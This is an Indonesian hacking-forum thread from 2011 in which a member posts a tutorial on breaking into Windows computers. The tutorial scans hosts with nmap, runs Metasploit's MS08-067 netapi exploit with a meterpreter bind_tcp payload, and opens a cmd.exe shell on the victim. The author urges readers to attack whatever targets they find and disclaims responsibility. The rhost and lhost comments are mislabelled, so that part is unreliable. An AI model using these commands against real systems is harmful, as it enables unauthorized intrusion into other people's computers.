Cielo-Hacker
Welcome To Cielo-Hacker.


Cielo-Hacker adalah Sebuah Komunitas Untuk Umum, Game dan Tempat Berkumpulnya para Cheater. Silahkan Bergabung dan membuat berbagai topik hangat tentang Game,Cheat Berbagi Software.

Silahkan Tekan Ctrl + D (Boorkmark) agar memudahkan anda berkunjung kembali ke Cielo-Hacker.

by : Admin



 
IndeksV.I.P ForumFAQPencarianAnggotaGroupPendaftaranLoginPortalCalendar
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
Top posters
[cielo]Snutz™
 
faryalfarisy
 
cielo-hacker
 
bhohand
 
[CieLo]-TRueLiFe
 
rgates
 
Administrator
 
[Cielo]-*Chibi-ShyNdrOms^
 
™[Zen_xxx_]™
 
[CieLo]-KeN†
 
Latest topics
Thanks To
Image and video hosting
 <a href=Image and video hosting by TinyPic
IKLAN


Share | 
 

 ExploiteWindows dengan Metasploit

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
™[Zen_xxx_]™
Registered Member
Registered Member


Jumlah posting : 24
Points : 62
Join date : 03.06.11
Age : 26
Lokasi : ada dech

PostSubyek: ExploiteWindows dengan Metasploit   Fri Jun 03, 2011 11:17 pm

Ni postingan ane yang pertma...heheheh Very Happy
kali saya akan coba berbagi bagaimana cara exploit window pake metasploit, langsung aja yah

1. pertama-tama sih scan IP bisa pake angry IP atau nmap

2. sambil nunggu scan IP selesai kita cek IP kita

3. kalau udah keluar daftar ip yang lagi on, kita scan satu persatu pake nmap, buka terminal ketik sudo nmap -O IpTarget, contoh nmap -O 192.168.1.5 nanti bakalan keliatan port berapa aja yang kebuka dan apa OSnya

hemmm… port 135 kebuka berarti kita siap mengeksekusi nih target

5. terus buka deh senjata kita yaitu metasploit dengan mengetik msfconsole di terminal

6. terus kita ketik
Code:
use windows/smb/ms08_067_netapi (enter)

    set payload windows/meterpreter/bind_tcp (enter)

    set rhost 192.168.215.52 (ini ip kita)

    set lhost 192.168.1.5 (ini ip target)

    exploit
7. kalau muncul >meterpreter berarti kita udah bisa nyusup ke komputer target tapi kalau nggak berarti firewall atau antivirus target kita kuat… kalau emang tetep mau ngehajar tuh komputer berarti harus jebol antivirus atau firewall nya dulu, tapi saya juga belum tau sih gimana jebolnya wkwkwkwk
jadi daripada ribet mending cari target lain aja

8. sebenernya sih udah bisa ngapain aja di sini… tapi biar lebih keliatan kalau kita udah nguasain tuh kompi kita ketik deh execute -f cmd.exe -c -i
nanti jadinya kaya gini

emmm….
kalau udah kaya gini terserah anda mau ngapain, tapi saya nggak mau tanggung jawab ya
hehehe
oh ya saya dapet tutorial dari om andi susilo
makasih buat om andi


tapi kalau manfaat jangan lupa donk



Kembali Ke Atas Go down
Lihat profil user
[cielo]Snutz™
V.I.P
V.I.P


Jumlah posting : 229
Points : 444
Join date : 08.05.11

PostSubyek: Re: ExploiteWindows dengan Metasploit   Sat Jun 11, 2011 12:48 am

Izin nyimak gan , sblumnya :
Kembali Ke Atas Go down
Lihat profil user
 
ExploiteWindows dengan Metasploit
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Cielo-Hacker :: Tech Zone :: Hacking/Cracking :: Exploit-
Navigasi: